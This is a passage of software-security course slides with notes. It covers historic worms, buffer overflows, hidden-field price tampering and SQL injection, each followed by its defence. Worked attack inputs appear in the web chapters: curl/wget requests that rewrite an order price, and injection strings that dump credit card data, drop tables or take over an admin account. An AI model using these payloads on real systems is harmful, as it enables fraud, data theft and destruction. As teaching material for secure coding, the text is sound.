UNIX host to another. We will talk about buffer overflow vulnerabilities later in this course. fingerd is the "finger daemon" server installed on all UNIX systems (finger is a program that lets you check whether a particular user is logged in), and the Morris worm leveraged the fact that fingerd is installed everywhere to propagate from one UNIX machine to the next. The sendmail vector was a debugging "feature" that Morris took advantage of to remotely execute code on another machine. Of course, debugging mode should have been disabled on production UNIX systems; that it wasn't highlights a problem still around today – making sure that systems are correctly configured to run securely.

118 5.2.2. The Morris Worm: What We Learned
Diversity is good: homogeneity of OSes on a network -> attacker can exploit vulnerabilities common to most machines Large programs are more vulnerable to attack sendmail was large, more bug-prone fingerd was small, but still buggy Limiting features limits holes: sendmail debug feature should have been turned off Users should choose good passwords: dictionary attack would have been harder Aside from the technical details of the worm and how it worked, we learned a number of other lessons. Diversity: if all the computers run the same operating system, they share the same vulnerabilities. Complexity: writing bug-free software is hard; the more lines of code, the more bugs, and the more likely that one of them results in an exploitable security vulnerability. Good passwords minimize the effectiveness of dictionary attacks. CERT: Computer Emergency Response Team. What if the Morris worm had done something serious? Would shutting down servers be a good idea?

119 The Creation of CERT Computer Emergency Response Team (CERT) created due to the damage and disruption caused by the Morris worm Has become a leading center on worm activity and software vulnerability announcements Raises awareness about cyber-security

120 5.2.4. The Code Red Worm (1) Exploited
Microsoft IIS web server buffer overflow “indexing server” feature: randomly scanned IP addresses to connect to other IIS servers Spread rapidly: > 2,000 hosts/min Evaded automated detection Detectable more easily by humans than scanners Resident only in memory, no disk writes Defaced home page of infected server

121 The Code Red Worm (2) Web server defaced by Code Red

122 The Nimda Worm Propagation vector: method by which a worm spreads to another machine Payload: data the worm carries as it travels Spread rapidly, made Code Red worse Used multiple propagation vectors Spread from server to server (as in Code Red) But also from server to client (a browser downloading an infected file also became infected) Infected clients sent emails with the worm code as the payload

123 5.2.6. Blaster Worm
Exploited buffer overflow in Microsoft OS: attacked the Distributed Component Object Model (DCOM) service A patch was deployed, but many users didn't download it Caused infected machines to shut down Issued a DDoS attack against the Windows Update website to prevent users from getting the patch

124 Blaster Worm System-shutdown dialog displayed by the Blaster worm

125 5.2.7. SQL Slammer Worm Exploited another buffer overflow
Fit in a single 376-byte UDP packet UDP is connectionless -> spread quickly Infected 75,000 hosts, 90% within 10 minutes Attacked Microsoft SQL Server DB application Disabled the server, scanned random IPs to infect Impact: excessive traffic from the worm propagating caused outages in 13,000 Bank of America ATMs Airline flights were cancelled & delayed

126 5.3. More Malware Rootkits: imposter OS tools used by attacker to hide his tracks Botnets: network of software robots attacker uses to control many machines at once to launch attacks (e.g. DDoS through packet flooding, click fraud) Spyware: software that monitors activity of a system or its users without their consent

127 5.3. More Malware Keyloggers: spyware that monitors user keyboard or mouse input, used to steal usernames, passwords, credit card #s, etc… Trojan Horses: software performs additional or different functions than advertised Adware: shows ads to users w/o their consent Clickbots: bot that clicks on ads, leads to click fraud (against cost-per-click or CPC ad models)

128 5.3. Distributing Malware Most malware is distributed through drive-by downloads (i.e. automatic installation of a binary when visiting a website) Uses a pull-based model (e.g. links) Maximizes exposure by getting as many links as possible to the malware distribution site Search engines such as Google mark pages as potentially malicious to prevent infection Source: N. Provos et al., "The Ghost in the Browser: Analysis of Web-based Malware"

129 5.3. Clickbot.A Botnet (1) Over 100,000 machines, HTTP-based botmaster Conducted low-noise click fraud against syndicated search engines Syndication: get feeds of ad impressions Sub-syndication: partner with a syndicated engine All get a share of revenue from a click Only 7 of 24 anti-virus scanners detected it in 5/06 IE browser helper object (BHO) Capable of accessing the entire DOM of web pages Written in PHP with a MySQL backend

130 5.3. Clickbot.A Botnet (2) Used doorway sites (with links for bots to click) posing as sub-syndicated search engines Fine-grained control for the botmaster Low noise: set the maxclicks a bot could do to 20 Used redirectors & several layers below major search engines (harder to detect/track) Source: N. Daswani et al., "The Anatomy of Clickbot.A"

131 Summary Worms propagate rapidly, exploit common vulnerabilities and cause widespread damage Prevention Eliminate Buffer Overflows (Programmers) Don't open attachments (Users, SAs) Disable unnecessary functionality (Users, SAs) Patch systems regularly (SAs) Detection Update scanners with the latest definitions Use auto-updating scanners when possible Employ programs such as Tripwire (SAs) There are various things that programmers, system admins, and users can do. Programmers can eliminate buffer overflows. Users should not open attachments; sys admins can auto-strip attachments. Sys admins and users can disable unnecessary functionality, and use firewalls to restrict access to ports that shouldn't be used and may be vulnerable.

132 CHAPTER 6 Buffer Overflows

133 Agenda Buffer overflows: attacker hijacks machine
Attacker injects malicious code into program Preventable, but common (50% of CERT advisories a decade after the Morris Worm) Fixes: safe string libraries, StackGuard, static analysis Other types of overflows: heap, integer, … Buffer overflow: déjà vu all over again. Up to 50 percent of today's widely exploited vulnerabilities are buffer overflows, according to an analysis by David Wagner, Jeffrey Foster, Eric Brewer, and Alexander Aiken in a paper presented at the Network and Distributed Systems Security conference (NDSS 2000). Furthermore, the analysis suggests that the ratio is increasing over time. The data are extremely discouraging, since the buffer overflow problem has been widely known in security circles for years. For some reason, developers have not readily moved to eliminate buffer overflows as the leading pitfall in software security. Chart: number of vulnerabilities resulting in CERT/CC advisories over the last eleven years; the number directly attributable to buffer overflows is not getting any better – in fact, buffer overflows are becoming more common.

134 6.1. Anatomy of a Buffer Overflow
Buffer: memory used to store user input, has fixed maximum size Buffer overflow: when user input exceeds max buffer size Extra input goes into unexpected memory locations So before we define what a buffer overflow vulnerability is, let’s first clarify what we mean by a “buffer.” A buffer is simply a memory location that can be used to store user input. Very often, buffers have a fixed maximum size. If the user provides more input than can fit in the buffer, the extra input might end up in places in memory that we do not expect, and the buffer is said to overflow. Let’s look at a simple example of a buffer, and how a buffer overflow can occur. (Insert picture of spilled milk.)

135 A Small Example Malicious user enters > 1024 chars, but buf can only store 1024 chars; the extra chars overflow the buffer:

void get_input() {
    char buf[1024];
    gets(buf);
}

void main(int argc, char *argv[]) {
    get_input();
}

Consider the example program on this slide; we will see that it is vulnerable to a buffer overflow attack. This very simple program is written in the C programming language. In the main function, the get_input() function is called to accept input from the user. get_input() has a variable called buf that it uses to store up to 1024 bytes of input. The gets() function simply asks the operating system to accept input from the user until the user hits the carriage return, and to store that input in buf; buf effectively holds a "buffer" containing the user input. What makes this program vulnerable is that, while most users will not enter input exceeding 1024 characters, a malicious user might enter more than 1024 characters before hitting the carriage return. The problem is that buf has only been allocated 1024 bytes of memory. What happens to the extra input? In a perfect world, it might just be ignored, gets() might return an error, or the program might be halted by the operating system. Unfortunately, because of the way gets() is written in the standard C library, something much worse can happen. This simple program does not do much to begin with, though, so let's look at a program whose functionality is a bit more significant.

136 6.1.2. A More Detailed Example
1  int checkPassword() {
2      char pass[16];
3      bzero(pass, 16); // Initialize
4      printf ("Enter password: ");
5      gets(pass);
6      if (strcmp(pass, "opensesame") == 0)
7          return 1;
8      else
9          return 0;
10 }
11
12 void openVault() {
13     // Opens the vault
14 }
15
16 main() {
17     if (checkPassword()) {
18         openVault();
19         printf ("Vault opened!");
20     }
21 }

In this slide, we have a slightly more complicated example. The program contains three functions: main, openVault, and checkPassword. Its purpose is to let a user enter a password and, if the password is correct, call the openVault function. In a real program, you can imagine that openVault issues a command that really opens a bank vault, dispenses cash out of an ATM, or performs some other security-critical operation based on the password check. main() calls checkPassword() to let the user enter a password; checkPassword returns 1 if the user enters the correct password (in this case, the string "opensesame") and 0 otherwise. If checkPassword returns a non-zero value, main calls openVault. While the code looks reasonable, it is vulnerable to a buffer overflow attack that makes it possible for an attacker to have openVault called without entering the correct password. To understand why, first notice that a 16-byte buffer called pass has been allocated to hold the password, and the same gets() function we saw in the previous slide fills that buffer. Second, consider what happens at the machine level when one function calls another. Microprocessors use an execution stack to keep track of what they are doing at any particular time. When the program starts running, the address of main() is pushed onto the stack; when main calls checkPassword(), a frame for checkPassword is pushed on top of it, so that when checkPassword finishes executing, the processor knows to jump back to main(). We denote the return address of main by &main. Since checkPassword uses the pass buffer, space for it is also allocated on the execution stack, right on top of the return address &main. If the user enters a password of fewer than 16 characters, all is well and good. But a malicious user can enter more than 16 characters, and the extra characters overwrite the return address for main. How bad is that? Very bad, actually: the return address can be overwritten with another address of the attacker's choosing. The attacker does not care what the first 16 characters are, but characters 17 through 20 matter a great deal.
Assuming the return address is 4 bytes, the malicious user can construct input whose characters 17 through 20 correspond to the address of another function in the program. If the attacker can determine the address of the openVault function, he can enter a "password" containing that address, and he never needs to know the real password to get the program to jump to it. Once the malicious input is entered, the string comparison against "opensesame" fails and checkPassword returns 0, BUT the program does NOT return to main – it returns to openVault!!! It turns out that figuring out the address of openVault is relatively easy given a binary of the program. In the class exercise associated with this lecture you will construct a buffer overflow attack yourself; for now, the key point is that by overflowing a buffer, a malicious user can cause a program to jump to a function of his or her choice instead of continuing its "normal" execution flow. So how do we fix the problem? We could make the buffer larger, but then a malicious user could simply enter more input. A better solution is to check the size of the input. Unfortunately, the gets() C function does not let us check the size of the input or impose a maximum limit, so we replace the call to gets() with a call to another function, safe_gets(), that does check the size of the input and accepts no more than 16 characters. Diagram: a "normal" stack (pass[16] above the return address &main in the checkPassword frame) vs. a compromised stack (pass[16] above a return address overwritten to point to openVault).

137 checkPassword() Bugs Execution stack: maintains current function state and the address of the function to return to Stack frame: holds vars and data for a function Extra user input (> 16 chars) overwrites the return address Attack string: chars 17–20 can specify the address of openVault() to bypass the check The address can be found with the source code or the binary

138 6.1.2. Non-Executable Stacks Don’t Solve It All
Attack could overwrite the return address to point to newly injected code NX (non-executable) stacks can prevent this, but not the vault example (jumping to an existing function) Return-into-libc attack: jump to existing library functions, e.g. ones that exec /bin/sh or cmd.exe, to gain a command shell (the usual goal of injected shellcode) and complete control

139 6.1.3. The safe_gets() Function
#define EOLN '\n'

void safe_gets (char *input, int max_chars) {
    if ((input == NULL) || (max_chars < 1))
        return;
    if (max_chars == 1) {
        input[0] = 0;
        return;
    }
    int count = 0;
    char next_char;
    do {
        next_char = getchar();   // one character at a time
        if (next_char != EOLN)
            input[count++] = next_char;
    } while ((count < max_chars - 1) &&   // leave space for null
             (next_char != EOLN));
    input[count] = 0;
}

Unlike gets(), safe_gets() takes a parameter specifying the maximum number of chars to insert in the buffer. Use it in checkPassword() instead of gets() (replacing line 5) to eliminate the buffer overflow vulnerability:

5   safe_gets(pass, 16);

140 6.2. Safe String Libraries C – Avoid (no bounds checks): strcpy(), strcat(), sprintf(), scanf() Use safer versions (with bounds checking): strncpy(), strncat(), fgets() Microsoft's StrSafe and Messier and Viega's SafeStr do bounds checks and null termination Must pass the right buffer size to the functions! C++: STL string class handles allocation Unlike compiled languages (C/C++), interpreted ones (Java/C#) enforce type safety and raise exceptions on buffer overflow At this point, you might be asking how to prevent your programs from being vulnerable to buffer overflows. In the last slide, part of the problem was that gets() wrote into the buffer without checking its size; as a result, a malicious user could use gets() to write addresses into the program's execution stack. gets() assumes the programmer is checking that the boundaries of the buffer are not overwritten – and, like many other C functions that make the same assumption, very often no such check is done. Included in this class of C functions are some very common ones such as string-copy, string-concatenate, sprintf, scanf, and many others. One solution is simply to avoid such functions, but re-coding your C programs that way can take a lot of work and is hard to do correctly; later on, we'll talk about other approaches to dealing with buffer overflows. You may also be asking whether programs you write in other languages are vulnerable too. The short answer is that C++ programs are highly susceptible, while Java programs are not as vulnerable; we'll explain why later and provide further tips for dealing with potential buffer overflows regardless of the programming language you use.
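A tiny Java demonstration (ours, not from the slides) of that last bullet – the runtime bounds check turns an overflow into an exception instead of memory corruption:

/* In Java, writing past the end of an array raises an exception at
   runtime rather than silently overwriting adjacent memory. */
public class BoundsDemo {
    public static void main(String[] args) {
        byte[] buf = new byte[16];
        buf[16] = 1;   // throws ArrayIndexOutOfBoundsException
    }
}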

141 6.3. Additional Approaches
Rewriting old string manipulation code is expensive, any other solutions? StackGuard/canaries (Crispin Cowan) Static checking (e.g. Coverity) Non-executable stacks Interpreted languages (e.g., Java, C#)

142 6.3.1. StackGuard Canary: random value, unpredictable to attacker
Compiler technique: inserts a canary before the return address on the stack Corrupt canary: code halts the program to thwart a possible attack Not comprehensive protection Source: C. Cowan et al., StackGuard

143 Static Analysis Tools Static analysis: analyzing programs without running them Meta-level compilation Find security, synchronization, and memory bugs Detect frequent code patterns/idioms and flag code anomalies that don't fit Ex: Coverity, Fortify, Ounce Labs, Klocwork Coverity found bugs in Linux device drivers

144 6.4. Performance Mitigating buffer overflow attacks incurs little performance cost Safe str functions take slightly longer to execute StackGuard canary adds small overhead But performance hit is negligible while security payoff is immense

145 6.5. Heap-Based Overflows Ex: malloc() in C provides a fixed-size chunk of memory on the heap Unless realloc() is called, the chunk stays that size; an attacker can overflow a heap buffer too, overwriting adjacent data to modify the control path of the program Same fixes: bounds-check all input

146 6.6. Other Memory Corruption Vulnerabilities
Memory corruption vulnerability: Attacker exploits programmer memory management error Other Examples Format String Vulnerabilities Integer Overflows Used to launch many attacks including buffer overflow Can crash program, take full control

147 6.6.1. Format String Vulnerabilities
Format string in C directs how text is formatted for output: e.g. %d, %s Can contain info on # of chars (e.g. %10s) If message or username is longer than 10 or 8 chars, the buffer overflows; an attacker can craft a username string to insert shellcode or a desired return address

void format_warning (char *buffer, char *username, char *message) {
    sprintf (buffer, "Warning: %10s -- %8s", message, username);
}

148 Integer Overflows (1) Exploits the limited range of values integers can store Ex: a signed 32-bit int stores values between -2^31 and 2^31-1 Causes unexpected wrap-around scenarios Attacker passes an int greater than the max (positive) -> the value wraps around to the min (negative!) Can cause unexpected program behavior and possible buffer overflow exploits
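A small Java demonstration of the wrap-around (our example; Java's int is a signed 32-bit integer):

/* Signed 32-bit arithmetic silently wraps: adding 1 to the maximum
   value yields the minimum, which is how a size check can go wrong. */
public class WrapDemo {
    public static void main(String[] args) {
        System.out.println(Integer.MAX_VALUE);       //  2147483647 (2^31 - 1)
        System.out.println(Integer.MAX_VALUE + 1);   // -2147483648 (wraps!)
        int slen = 16;
        int offset = Integer.MAX_VALUE;
        System.out.println(slen + offset);           // negative "size"
    }
}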

149 Integer Overflows (2)

/* Writes str to buffer with offset characters of blank spaces preceding str. */
void formatStr(char *buffer, int buflen, int offset, char *str, int slen) {
    char message[slen + offset];
    int i;

    /* Write blank spaces */
    for (i = 0; i < offset; i++)
        message[i] = ' ';

    strncpy(message + offset, str, slen);   // offset = 2^31!?
    strncpy(buffer, message, buflen);
    message[buflen - 1] = 0;   /* Null terminate */
}

Attacker sets offset near 2^31: slen + offset wraps around to a negative value! Writes outside the bounds of message; can write to arbitrary addresses on the heap!

150 Summary Buffer overflows most common security threat!
Used in many worms, such as the Morris Worm Affects both stacks and heaps Attacker can run desired code and hijack the program Prevent by bounds-checking all buffers And/or use StackGuard, static analysis… Other types of memory corruption: format string vulnerabilities, integer overflow, etc…

151 CHAPTER 7 Client-State Manipulation

152 Agenda Web application – collection of programs used by server to reply to client (browser) requests Often accept user input: don’t trust, validate! HTTP is stateless, servers don’t keep state To conduct transactions, web apps have state State info may be sent to client who echoes it back in future requests Example Exploit: “Hidden” parameters in HTML are not really hidden, can be manipulated Also, validating input at client (i.e., with JavaScript) is ineffective for security

153 7.1. Pizza Delivery Web Site Example
Web app for delivering pizza Online order form: order.html – say the user buys one pizza for $5.50 Confirmation form: generated by the confirm_order script; asks the user to verify the purchase; the price is sent as a hidden form field Fulfillment: the submit_order script handles the user's order, received as a GET request from the confirmation form (pay & price variables embedded as parameters in the URL)

154 7.1. Pizza Web Site Code
Confirmation form:

<HTML><head><title>Pay for Pizza</title></head>
<body><form action="submit_order" method="GET">
<p> The total cost is 5.50. Are you sure you would like to order? </p>
<input type="hidden" name="price" value="5.50">
<input type="submit" name="pay" value="yes">
<input type="submit" name="pay" value="no">
</form></body></HTML>

Submit order script:

if (pay = yes) {
    success = authorize_credit_card_charge(price);
    if (success) {
        settle_transaction(price);
        dispatch_delivery_person();
    } else {
        // Could not authorize card
        tell_user_card_declined();
    }
} else {
    display_transaction_cancelled_page();   // no
}

155 7.1. Buying Pizza Example
Diagram: Browser (client) ↔ Web Server ↔ Credit Card Payment Gateway. Order 1 pizza → Confirm $5.50 → Submit Order $5.50 (submit_order?price=5.50). The price is stored in a hidden form variable, which the attacker will modify.

156 Attack Scenario (1) Attacker navigates to order form…

157 Attack Scenario (2) …then to submit order form

158 Attack Scenario (3) And he can View | Source:

159 7.1.1. Attack Scenario (4) Changes price in source, reloads page!
Browser sends request: GET /submit_order?price=0.01&pay=yes HTTP/1.1 Hidden form variables are essentially sent in the clear

160 7.1.1. Attack Scenario (5)
Diagram: Browser (client) ↔ Web Server ↔ Credit Card Payment Gateway. Order 1 pizza → Confirm $5.50 → Submit Order $0.01. The attacker modified the price!

161 Attack Scenario (6) Command-line tools can generate HTTP requests; curl or wget automates & speeds up the attack (the site's URL, elided in the slides, is shown here as <site>):

curl 'https://<site>/submit_order?price=0.01&pay=yes'

Even against POST, params can be specified as arguments to the curl or wget command:

curl -d price=0.01 -d pay=yes 'https://<site>/submit_order'
wget --post-data 'price=0.01&pay=yes' 'https://<site>/submit_order'

162 7.1.2. Solution 1: Authoritative State Stays on Server
Server sends a session-id to the client; the server has a table mapping session-ids to prices. A randomly generated (hard to guess) 128-bit id is sent in a hidden form field instead of the price:

<input type="hidden" name="session-id" value="3927a837e947df203784d309c8372b8e">

New request:
GET /submit_order?session-id=3927a837e947df203784d309c8372b8e&pay=yes HTTP/1.1

163 7.1.2. Solution 1 Changes submit_order script changes:
if (pay = yes) {
    price = lookup(session-id);   // in table
    if (price != NULL) {
        // same as before
    } else {
        // Cannot find session
        display_transaction_cancelled_page();
        log_client_IP_and_info();
    }
} else {
    // same no case
}

164 7.1.2. Session Management 128-bit session-id, n = # of session-ids
Limit chance of a correct guess to n/2^128. Time-out idle session-ids; clear expired session-ids. Session-id: hash of a random # & the IP address – harder to attack (attacker also needs to spoof the IP). Con: server requires a DB lookup for each request. Performance bottleneck – possible DoS from attackers sending random session-ids. Distribute the DB, load-balance requests.
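A minimal Java sketch of generating such an id, assuming java.security.SecureRandom as the source of randomness (class and method names are ours):

import java.security.SecureRandom;

/* Illustrative sketch: a 128-bit session-id, hex-encoded for use in a
   hidden form field or cookie. */
public class SessionIdGenerator {
    private static final SecureRandom RNG = new SecureRandom();

    public static String newSessionId() {
        byte[] bytes = new byte[16];   // 16 bytes = 128 bits
        RNG.nextBytes(bytes);
        StringBuilder hex = new StringBuilder(32);
        for (byte b : bytes) {
            hex.append(String.format("%02x", b));
        }
        return hex.toString();
    }
}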

165 7.1.3. Solution 2: Signed State To Client
Keep server stateless; attach a signature to the state and send it to the client. Can detect tampering through MACs. Sign the whole transaction (based on all parameters). Security based on a secret key known only to the server.

<input type="hidden" name="item-id" value=" ">
<input type="hidden" name="qty" value="1">
<input type="hidden" name="address" value="123 Main St, Stanford, CA">
<input type="hidden" name="credit_card_no" value=" ">
<input type="hidden" name="exp_date" value="1/2012">
<input type="hidden" name="price" value="5.50">
<input type="hidden" name="signature" value="a2a30984f302c843284e b33d2">

166 7.1.3. Solution 2 Analysis Changes in submit_order script:
Can detect tampered state vars from an invalid signature. Performance hit: compute MACs when processing HTTP requests; stream state info to the client -> extra bandwidth.

if (pay = yes) {
    // Aggregate transaction state parameters
    // Note: | is concatenation operator, # a delimiter.
    state = item-id | # | qty | # | address | # |
            credit_card_no | # | exp_date | # | price;
    // Compute message authentication code with server key K.
    signature_check = MAC(K, state);
    if (signature == signature_check) {
        // proceed normally
    } else {
        // Invalid signature: cancel & log
    }
} else {
    // no pay – cancel
}
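The pseudocode leaves MAC abstract. A hedged Java sketch of the server-side computation, standardizing here on HMAC-SHA256 (the slides do not name a specific MAC algorithm; class and method names are ours):

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;

/* Illustrative sketch: HMAC-SHA256 over the concatenated transaction
   state, keyed with secret key K known only to the server. */
public class StateSigner {
    public static byte[] mac(byte[] serverKeyK, String state) throws Exception {
        Mac hmac = Mac.getInstance("HmacSHA256");
        hmac.init(new SecretKeySpec(serverKeyK, "HmacSHA256"));
        return hmac.doFinal(state.getBytes(StandardCharsets.UTF_8));
    }
}

On each submit_order request the server recomputes the MAC over the submitted parameters and compares it with the signature field; any tampered parameter yields a mismatch.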

167 7.2. POST Instead of GET
GET: form params (e.g. session-id) leak in the URL Could anchor these links in lieu of hidden form fields Alice sends Meg the URL in an email; Meg follows it & continues the transaction w/o Alice's consent Referers can also leak through outlinks: a "This link" anchor pointing at another site (e.g. <a href="https://<grocery-store-site>/">) sends the request:

GET / HTTP/1.1
Referer: <confirmation-page URL>?session-id=3927a837e947df203784d309c8372b8e

Session-id leaked to the grocery-store-site's logs!

168 7.2. Benefits of POST
POST request:

POST /submit_order HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

session-id%3D3927a837e947df203784d309c8372b8e

Session-id not visible in the URL; pasting the URL into an email wouldn't leak it Slightly inconvenient for the user, but more secure Referers can still leak w/o user interaction: instead of a link, an image (e.g. <img src="https://<grocery-store-site>/banner.gif">) makes the browser issue a GET request for banner.gif that still leaks the session-id

169 7.3. Cookies Cookie - piece of state maintained by client
Server gives cookie to client Client returns cookie to server in subsequent HTTP requests Ex: session-id in a cookie in lieu of a hidden form field The secure attribute dictates using SSL

Server replies:
HTTP/1.1 200 OK
Set-Cookie: session-id=3927a837e947df203784d309c8372b8e; secure

Browser then sends:
GET /submit_order?pay=yes HTTP/1.1
Cookie: session-id=3927a837e947df203784d309c8372b8e

170 7.3. Problems with Cookies Cookies are associated with browser
Sent back w/ each request, no hidden field to tack on If user doesn’t log out, attacker can use same browser to impersonate user Session-ids should have limited lifetime

171 7.4. JavaScript (1) Popular client-side scripting language
Ex: Compute prices of an order:

<html><head><title>Order Pizza</title></head><body>
<form action="submit_order" method="GET" name="f">
How many pizzas would you like to order?
<input type="text" name="qty" value="1" onKeyUp="computePrice();">
<input type="hidden" name="price" value="5.50"><br>
<input type="submit" name="Order" value="Pay">
<input type="submit" name="Cancel" value="Cancel">
<script>
function computePrice() {
    f.price.value = 5.50 * f.qty.value;   // compute new value
    f.Order.value = "Pay " + f.price.value;   // update price
}
</script>
</body></html>

172 7.4. JavaScript (2) Evil user can simply delete the JavaScript code, substitute desired parameters & submit! Could also just submit the request directly & bypass the JavaScript: GET /submit_order?qty=1000&price=0&Order=Pay Warning: data validation or computations done in JavaScript cannot be trusted by the server An attacker may alter the script in the HTML code to modify the computations They must be redone on the server to verify (see the sketch below)
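A hedged server-side sketch of that re-validation (names and bounds invented here): the server recomputes the price from its own unit price and validates the quantity, ignoring whatever price the browser sent:

/* Illustrative sketch: the total is recomputed from trusted data; the
   client-sent "price" parameter is never used. */
public class PriceValidator {
    private static final double UNIT_PRICE = 5.50;   // the slides' pizza price

    public static double priceFor(int qty) {
        if (qty < 1 || qty > 100) {                  // reject absurd orders
            throw new IllegalArgumentException("invalid quantity: " + qty);
        }
        return UNIT_PRICE * qty;                     // ignore client's price
    }
}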

173 Summary Web applications need to maintain state
HTTP stateless Hidden form fields, cookies Session management, server with state… Don't trust user input! Keep state on the server (space-expensive) Or sign transaction params (bandwidth-expensive) Use cookies, be wary of cross-site attacks (cf. Ch. 10) No JavaScript for computations & validations

174 CHAPTER 8 SQL Injection

175 Agenda Command injection vulnerability - untrusted input inserted into query or command Attack string alters intended semantics of command Ex: SQL Injection - unsanitized data used in query to back-end database (DB) SQL Injection Examples & Solutions Type 1: compromises user data Type 2: modifies critical data Whitelisting over Blacklisting Escaping Prepared Statements and Bind Variables

176 SQL Injection Impact in the Real World
CardSystems, credit card payment processing Ruined by SQL Injection attack in June 2005 263,000 credit card #s stolen from its DB #s stored unencrypted, 40 million exposed Awareness Increasing: # of reported SQL injection vulnerabilities tripled from 2004 to 2005

177 8.1. Attack Scenario (1) Ex: Pizza Site Reviewing Orders
Form requesting a month # to view that month's orders. HTTP request: the month is passed as a query parameter (e.g. ?month=10; the full URL is elided in the slides)

178 8.1. Attack Scenario (2) App constructs SQL query from parameter:
sql_query = "SELECT pizza, toppings, quantity, order_day " +
            "FROM orders " +
            "WHERE userid=" + session.getCurrentUserId() + " " +
            "AND order_month=" + request.getParameter("month");

Normal SQL query:
SELECT pizza, toppings, quantity, order_day
FROM orders
WHERE userid=4123 AND order_month=10

Type 1 Attack: inputs month='0 OR 1=1'! Goes to the encoded URL (space -> %20, = -> %3D)

179 8.1. Attack Scenario (3) Malicious Query
Malicious query:

SELECT pizza, toppings, quantity, order_day
FROM orders
WHERE userid=4123 AND order_month=0 OR 1=1

The WHERE condition is always true! (AND binds tighter than OR, so it reads (userid=4123 AND order_month=0) OR 1=1.) Type 1 Attack: gains access to other users' private data! All user data compromised

180 8.1. Attack Scenario (4) More damaging attack: attacker sets
month=0 AND 1=0 UNION SELECT cardholder, number, exp_month, exp_year FROM creditcards
The attacker is able to combine 2 queries: the 1st query returns an empty table (its WHERE clause fails); the 2nd returns the credit card #s of all users

181 8.1. Attack Scenario (4) Even worse, attacker sets
month=0; DROP TABLE creditcards;
Then DB executes:
SELECT pizza, toppings, quantity, order_day FROM orders WHERE userid=4123 AND order_month=0; DROP TABLE creditcards;
Type 2 Attack: Removes creditcards from schema! Future orders fail: DoS!
Problematic Statements: Modifiers: INSERT INTO admin_users VALUES ('hacker',...) Administrative: shut down DB, control OS…

182 8.1. Attack Scenario (5) Injecting String Parameters: Topping Search
sql_query = "SELECT pizza, toppings, quantity, order_day " +
            "FROM orders " +
            "WHERE userid=" + session.getCurrentUserId() + " " +
            "AND topping LIKE '%" + request.getParameter("topping") + "%'";
Attacker sets: topping=brzfg%'; DROP table creditcards; --
Query evaluates as:
SELECT pizza, toppings, quantity, order_day FROM orders WHERE userid=4123 AND topping LIKE '%brzfg%'; DROP table creditcards; --%'
SELECT returns an empty table; -- comments out the trailing quote; creditcards table is dropped

183 8.1. Attack Scenario (6) [image: SQL-injection cartoon; source omitted in transcript]

184 8.2. Solutions Variety of Techniques: Defense-in-depth
Whitelisting over Blacklisting Input Validation & Escaping Use Prepared Statements & Bind Variables Mitigate Impact

185 8.2.1. Why Blacklisting Does Not Work
Eliminating quotes enough (blacklist them)? kill_quotes (Java) removes single quotes:
String kill_quotes(String str) {
  StringBuffer result = new StringBuffer(str.length());
  for (int i = 0; i < str.length(); i++) {
    if (str.charAt(i) != '\'') result.append(str.charAt(i));
  }
  return result.toString();
}
sql_query = "SELECT pizza, toppings, quantity, order_day " +
            "FROM orders " +
            "WHERE userid=" + session.getCurrentUserId() + " " +
            "AND topping LIKE '%" + kill_quotes(request.getParameter("topping")) + "%'";

186 8.2.1. Pitfalls of Blacklisting
Filter quotes, semicolons, whitespace, and…? Could always miss a dangerous character Blacklisting not comprehensive solution Ex: kill_quotes() can’t prevent attacks against numeric parameters May conflict with functional requirements How to store O’Brien in DB if quotes blacklisted?

187 8.2.2. Whitelisting-Based Input Validation
Whitelisting – only allow input within well-defined set of safe values set implicitly defined through regular expressions RegExp – pattern to match strings against Ex: month parameter: non-negative integer RegExp: ^[0-9]*$ - 0 or more digits, safe subset The ^, $ match beginning and end of string [0-9] matches a digit, * specifies 0 or more
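A small Java sketch of this whitelist check (names are illustrative; it tightens the slide's ^[0-9]*$ pattern slightly by requiring 1-2 digits and range-checking the parsed value):

import java.util.regex.Pattern;

public class MonthValidator {
    // Digits only, at most two of them; everything else is rejected outright
    private static final Pattern MONTH = Pattern.compile("^[0-9]{1,2}$");

    public static int parseMonth(String raw) {
        if (raw == null || !MONTH.matcher(raw).matches()) {
            throw new IllegalArgumentException("month must be 1-2 digits");
        }
        int m = Integer.parseInt(raw);               // safe: input is all digits
        if (m < 1 || m > 12) {
            throw new IllegalArgumentException("month out of range");
        }
        return m;
    }
}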

188 8.2.3. Escaping Could escape quotes instead of blacklisting
Ex: insert user o'connor, password terminator
escape(o'connor) = o''connor
sql = "INSERT INTO USERS(uname,passwd) " +
      "VALUES ('" + escape(uname) + "','" + escape(password) + "')";
INSERT INTO USERS(uname,passwd) VALUES ('o''connor','terminator');
Like kill_quotes, only works for string inputs Numeric parameters could still be vulnerable
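A sketch of what an escape() like the one above might look like, assuming the database follows standard SQL and treats a doubled single quote ('') as an escaped quote:

static String escape(String s) {
    StringBuilder out = new StringBuilder(s.length());
    for (int i = 0; i < s.length(); i++) {
        char c = s.charAt(i);
        out.append(c);
        if (c == '\'') out.append('\'');  // double each quote: o'connor -> o''connor
    }
    return out.toString();
}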

189 8.2.4. Second-Order SQL Injection (1)
Second-Order SQL Injection: data stored in database is later used to conduct SQL injection Common if string escaping is applied inconsistently Ex: o'connor updates passwd to SkYn3t Username not escaped, b/c originally escaped before entering DB, now inside our trust zone: Query fails b/c ' after o ends command prematurely new_passwd = request.getParameter("new_passwd"); uname = session.getUsername(); sql = "UPDATE USERS SET passwd='"+ escape(new_passwd) + "' WHERE uname='" + uname + "'"; UPDATE USERS SET passwd='SkYn3t' WHERE uname='o'connor'

190 8.2.4. Second-Order SQL Injection (2)
Even Worse: What if user set uname=admin'-- !? Attacker changes admin’s password to cracked Has full access to admin account Username avoids collision with real admin -- comments out trailing quote All parameters dangerous: escape(uname) UPDATE USERS SET passwd='cracked' WHERE uname='admin' --'

191 8.2.5. Prepared Statements & Bind Variables
Metachars (e.g. quotes) provide distinction between data & control in queries most attacks: data interpreted as control alters the semantics of a query Bind Variables: ? placeholders guaranteed to be data (not control) Prepared Statements allow creation of static queries with bind variables Preserves the structure of intended query Parameters not involved in query parsing/compiling

192 8.2.5. Java Prepared Statements
PreparedStatement ps = db.prepareStatement(
    "SELECT pizza, toppings, quantity, order_day " +
    "FROM orders WHERE userid=? AND order_month=?");
ps.setInt(1, session.getCurrentUserId());
ps.setInt(2, Integer.parseInt(request.getParameter("month")));
ResultSet res = ps.executeQuery();
Bind Variable: Data Placeholder Query parsed without parameters Bind variables are typed: input must be of expected type (e.g. int, string)

193 8.2.5. PHP Prepared Statements
